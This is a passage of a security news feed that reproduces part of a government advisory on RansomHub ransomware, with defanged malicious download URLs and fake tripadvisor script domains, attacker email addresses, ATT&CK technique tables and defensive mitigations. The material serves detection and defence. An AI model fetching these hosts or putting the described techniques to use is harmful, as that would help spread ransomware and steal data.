<td>http[:]//89.23.96[.]203/333/msi.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/SspiCli.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/TmsLA6kdcU8jxKzpMvbUVweTeF5YcR.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/urlmon.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/USERENV.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/webio.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/winhttp.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/WININET.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/WINMM.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/WINMMBASE.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/winnlsres.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/xwenxub285p83ecrzvft.exe.Config</td>
</tr>
<tr>
<td>http[:]//temp.sh/KnCqD/superloop.exe</td>
</tr>
<tr>
<td>https[:]//grabify.link/Y33YXP</td>
</tr>
<tr>
<td>https[:]//<a>i.ibb.co</a>/2KBydfw/112882618.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/4g6jH2J/2773036704.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/b1bZBpg/2615174623.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/Fxhyq6t/2077411869.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/HK0jV1G/534475006.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/nbMNnW4/2501108160.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/p1RCtpy/2681232755.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/SxQLwYm/1038436121.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/v1bn9ZK/369210627.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/V3Kj1c2/1154761258.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.co/X2FR8Kz/2113791011.png</td>
</tr>
<tr>
<td>https[:]//i.ibb.com:443/V3Kj1c2/1154761258.png</td>
</tr>
<tr>
<td>https[:]//12301230[.]co/npm/module.tripadvisor/module.tripadvisor.css</td>
</tr>
<tr>
<td>https[:]//12301230[.]co/npm/module.external/jquery.min.js</td>
</tr>
<tr>
<td>https[:]//12301230[.]co/npm/module.external/moment.min.js</td>
</tr>
<tr>
<td>https[:]//12301230[.]co/npm/module.external/client.min.js</td>
</tr>
<tr>
<td>https[:]//<a>12301230[.]co</a>/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external/jquery.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external/moment.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external/client.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co/</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co/npm/</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co/npm/module.external/client.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external/jquery.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external</td>
</tr>
<tr>
<td><a>https[:]//samuelelena[.]co</a>/np</td>
</tr>
<tr>
<td>https[:]/samuelelena[.]co/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module[.]tripadvisor/module[.]tripadvisor[.]js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module[.]external/client.min.js</td>
</tr>
<tr>
<td>https[:]//samuelelena[.]co/npm/module.external/jquery.min.js&amp;nbsp;</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co:443/</td>
</tr>
<tr>
<td>http[:]//samuelelena[.]co/npm/module.external/jquery.min.js</td>
</tr>
<tr>
<td><a>https[:]//40031[.]co</a>/npm/module.tripadvisor/module.tripadvisor.css</td>
</tr>
<tr>
<td>https[:]//40031[.]co/npm/module.external/jquery.min.js</td>
</tr>
<tr>
<td>https[:]//40031[.]co/npm/module.external/moment.min.js</td>
</tr>
<tr>
<td>https[:]//40031[.]co/npm/module.external/client.min.js</td>
</tr>
<tr>
<td>https[:]//40031[.]co/npm/module.tripadvisor/module.tripadvisor.js</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5: Emails Related to RansomHub (2023-2024)</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Email Addresses</th>
</tr>
</thead>
<tbody>
<tr>
<td>brahma2023[@]onionmail.org</td>
</tr>
<tr>
<td>&lt;victim_organization_name&gt;[@]protonmail.com</td>
</tr>
</tbody>
</table>
<h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 6–Table 17 </strong>for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6: Resource Development</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Obtain Capabilities: Exploits</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1588/005/" title="Obtain Capabilities: Exploits">T1588.005</a></td>
<td>RansomHub affiliates may buy, steal, or download exploits that can be used during targeting.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1566/" title="Phishing">T1566</a></td>
<td>RansomHub affiliates used mass phishing and spear-phishing emails to obtain initial access.</td>
</tr>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
<td>RansomHub affiliates may exploit known vulnerabilities to obtain initial access.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter">T1059.001</a></td>
<td>RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.</td>
</tr>
<tr>
<td>Windows Management Instrumentation</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1047/" title="Windows Management Instrumentation">T1047</a></td>
<td>RansomHub affiliates may abuse Windows Management Instrumentation to execute malicious commands and payloads.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title </th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter">T1059.001</a></td>
<td>RansomHub affiliates used PowerShell and Scripts to quickly run and automate intrusion.</td>
</tr>
<tr>
<td>Create Account</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1136/" title="Create Account">T1136</a></td>
<td>RansomHub affiliates may create an account to maintain access to victim systems.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10: Privilege Escalation</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Account Manipulation</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1098/" title="Account Manipulation">T1098</a></td>
<td>RansomHub affiliates may manipulate accounts to maintain and/or elevate access to victim systems.</td>
</tr>
<tr>
<td>Remote Services: Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a></td>
<td>RansomHub affiliates may log onto systems using the Remote Desk Protocol, then perform actions as the logged-on user.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 11: Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Masquerading</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1036/" title="Masquerading">T1036</a></td>
<td>RansomHub affiliates may hide binaries by renaming executable names.</td>
</tr>
<tr>
<td>Indicator Removal on Host</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1070/" title="Indicator Removal on Host">T1070</a></td>
<td>RansomHub affiliates may remove logs to inhibit cybersecurity response.</td>
</tr>
<tr>
<td>Impair Defenses: Disable or Modify Tools</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a></td>
<td>RansomHub affiliates may disable endpoint detection and response (EDR) tooling to avoid detection.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 12: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>OS Credential Dumping</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1003/" title="OS Credential Dumping">T1003</a></td>
<td>RansomHub affiliates used Mimikatz on Windows systems to gather credentials.</td>
</tr>
<tr>
<td>Brute Force: Password Spraying</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a></td>
<td>RansomHub affiliates may use password spraying to obtain initial access.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 13: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote System Discovery</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1018/" title="Remote System Discovery">T1018</a></td>
<td>RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. </td>
</tr>
<tr>
<td>Network Service Discovery</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1046/" title="Network Service Discovery">T1046</a></td>
<td>RansomHub affiliates may attempt to get a listing of services running on remote hosts and local network infrastructure devices,</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 14: Lateral Movement</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exploitation of Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1210/" title="Exploitation of Remote Services">T1210</a></td>
<td>RansomHub affiliates may exploit remote service to gain unauthorized access to internal systems once inside of a network. </td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 15: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote Access Software</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1219/" title="Remote Access Software">T1219</a></td>
<td>RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 16: Exfiltration</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1048/002/" title="Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol">T1048.002</a></td>
<td>RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.</td>
</tr>
<tr>
<td>Transfer Data to Cloud Account</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1537/" title="Transfer Data to Cloud Account">T1537</a></td>
<td>RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.</td>
</tr>
<tr>
<td>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1048/003/" title="Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol">T1048.003</a></td>
<td>RansomHub affiliates may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 17: Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Encrypted for Impact</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1486/" title="Data Encrypted for Impact">T1486</a></td>
<td>RansomHub affiliates used encryption for ransomware operations.</td>
</tr>
<tr>
<td>Inhibit System Recovery</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T1490/" title="Inhibit System Recovery">T1490</a></td>
<td>RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations.</td>
</tr>
</tbody>
</table>
<h2><strong>Incident Response</strong></h2>
<p>If compromise is detected, organizations should:</p>
<ol>
<li>Quarantine or take potentially affected hosts offline.</li>
<li>Reimage compromised hosts.</li>
<li>Provision new account credentials.</li>
<li>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.</li>
<li>Report the compromise to CISA via CISA’s 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or 888-282-0870). State, local, tribal, or territorial government entities can also report to the Multi-State Information Sharing and Analysis Center (MS-ISAC) (<a href="mailto:SOC@cisecurity.org" title="Report to MS-ISAC">SOC@cisecurity.org</a> or 866-787-4722).</li>
</ol>
<h2><strong>Mitigations</strong></h2>
<h3>Network Defenders</h3>
<p>The authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</strong></li>
<li><strong>Require all accounts with password logins</strong> <strong>(e.g., service accounts, admin accounts, and domain admin accounts) to comply with </strong><a href="https://pages.nist.gov/800-63-3/" title="Digital Identity Guidelines">National Institute for Standards and Technology (NIST) standards</a><strong> for developing and managing password policies.</strong>
<ul>
<li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;</li>
<li>Store passwords in hashed format using industry-recognized password managers;</li>
<li>Add password user “salts” to shared login credentials;</li>
<li>Avoid reusing passwords;</li>
<li>Implement multiple failed login attempt account lockouts;</li>
<li>Disable password “hints”; and</li>
<li>Refrain from requiring password changes more frequently than once per year.<br><strong>Note:</strong> NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
<li>Require administrator credentials to install software.</li>
</ul>
</li>
<li><strong>Keep all operating systems, software, and firmware up to date</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E)" title="Mitigating Known Vulnerabilities (1.E)">CPG 1.E</a>]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.</li>
<li><strong>Require Phishing-Resistant multifactor authentication to administrator accounts</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CPG 2.H</a>] and require standard MFA for all services to the extent possible (particularly for webmail, virtual private networks, and accounts that access critical systems).</li>
<li><strong>Segment networks</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.</li>
<li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CPG 3.A</a>]. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
<li><strong>Install, regularly update, and enable real time detection for antivirus</strong> <strong>software on all hosts.</strong></li>
<li><strong>Implement Secure Logging Collection and Storage Practices </strong>[<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#LogCollection2T" title="Log Collection (2.T)">CPG 2.T</a>].<strong> </strong>Learn more about logging best practices by referencing <a href="https://www.cisa.gov/resources-tools/services/logging-made-easy" title="Logging Made Easy">CISA’s Logging Made Easy</a> resources.</li>
<li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts.</li>
<li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege.</li>
<li><strong>Disable unused ports.</strong></li>
<li><strong>Implement and enforce email security policies</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#EmailSecurity2M" title="Email Security (2.M)">CPG 2.M</a>].</li>
<li><strong>Disable macros by default</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DisableMacrosbyDefault2N" title="Disable Macros by Default (2.N)">CPG 2.N</a>].</li>
<li><strong>Consider adding an email banner to emails</strong> received from outside your organization.</li>
<li><strong>Disable hyperlinks in received emails.</strong></li>
<li><strong>Implement time-based access for accounts set at the admin level and higher.</strong> For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
<li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.</li>
<li><strong>Maintain offline backups of data, and regularly maintain backup and restoration</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="System Backups (2.R)">CPG 2.R</a>]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.</li>
<li><strong>Ensure all backup data is encrypted,</strong> immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.</li>
</ul>
<h3>Software Manufacturers</h3>
<p>The above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team):</p>
<ul>
<li><strong>Embed security into product architecture</strong> throughout the entire software development lifecycle (SDLC).</li>
<li><strong>Mandate MFA, ideally phishing-resistant MFA, for privileged users</strong> and make MFA a default, rather than opt-in, feature.</li>
</ul>
<p>These mitigations align with tactics provided in the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a>. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage.</p>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see<strong> Table 6–Table 17</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<ul>
<li>#<a href="https://www.stopransomware.gov/">StopRansomware</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
<li>Resource to reduce the risk of a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide">#StopRansomware Guide</a>.</li>
<li>No-cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0">Ransomware Readiness Assessment</a>.</li>
<li>Health and Human Services <a href="https://hhscyber.hhs.gov/">HPH Cybersecurity Gateway</a> hosts the HPH CPGs and links to HHS cybersecurity resources.</li>
</ul>
<h2><strong>References</strong></h2>
<ol>
<li><a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-knight" title="Ransomware Roundup - Knight">Ransomware Roundup - Knight | FortiGuard Labs (fortinet.com)</a></li>
<li><a href="https://redskyalliance.org/xindustry/knight-ransomware" title="Knight Ransomware">Knight Ransomware - X-Industry - Red Sky Alliance</a></li>
<li><a href="https://www.uptycs.com/blog/threat-research-report-team/cyclops-ransomware-stealer-combo" title="Exploring a Dual Threat: Cyclops Ransomware &amp; Stealer Combo">Cyclops Ransomware and Stealer Combo: Exploring a Dual Threat (uptycs.com)</a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/" title="Knight ransomware distributed in fake Tripadvisor complaint emails">Knight ransomware distributed in fake Tripadvisor complaint emails (bleepingcomputer.com)</a></li>
</ol>
<h2><strong>Reporting</strong></h2>
<p>Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.</p>
<p>The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
<p>Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
<p>The authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s <a href="https://www.ic3.gov/Home/ComplaintChoice" title="Internet Crime Complain Center (IC3)">Internet Crime Complain Center (IC3)</a>, a <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/report" title="Report to CISA">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov)" title="Report to CISA">report@cisa.gov</a>) or by calling 1-844-Say-CISA (1-844-729-2472).</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat Actors Favor Rclone, WinSCP and cURL as Data Exfiltration Tools]]></title>
<description><![CDATA[ReliaQuest found that Rclone, WinSCP and cURL were the top three data exfiltration tools utilized by threat actors over the past year]]></description>
<link>https://tsecurity.de/de/2270029/it-security-nachrichten/threat-actors-favor-rclone-winscp-and-curl-as-data-exfiltration-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2270029/it-security-nachrichten/threat-actors-favor-rclone-winscp-and-curl-as-data-exfiltration-tools/</guid>
<pubDate>Fri, 09 Aug 2024 11:05:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ReliaQuest found that Rclone, WinSCP and cURL were the top three data exfiltration tools utilized by threat actors over the past year]]></content:encoded>
</item>
<item>
<title><![CDATA[Review on Ubuntu and a few questions from a Newcomer]]></title>
<description><![CDATA[About 2-3 months ago, I decided to switch from Windows to Ubuntu (dual-boot). I've enjoyed it quite a lot actually... More than I thought I would. It was like unwrapping a gift that I know is gonna be good. Prologue: I'm a recent computer science graduate who's unemployed and has only ever used W...]]></description>
<link>https://tsecurity.de/de/2191633/linux-tipps/review-on-ubuntu-and-a-few-questions-from-a-newcomer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2191633/linux-tipps/review-on-ubuntu-and-a-few-questions-from-a-newcomer/</guid>
<pubDate>Fri, 21 Jun 2024 08:46:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
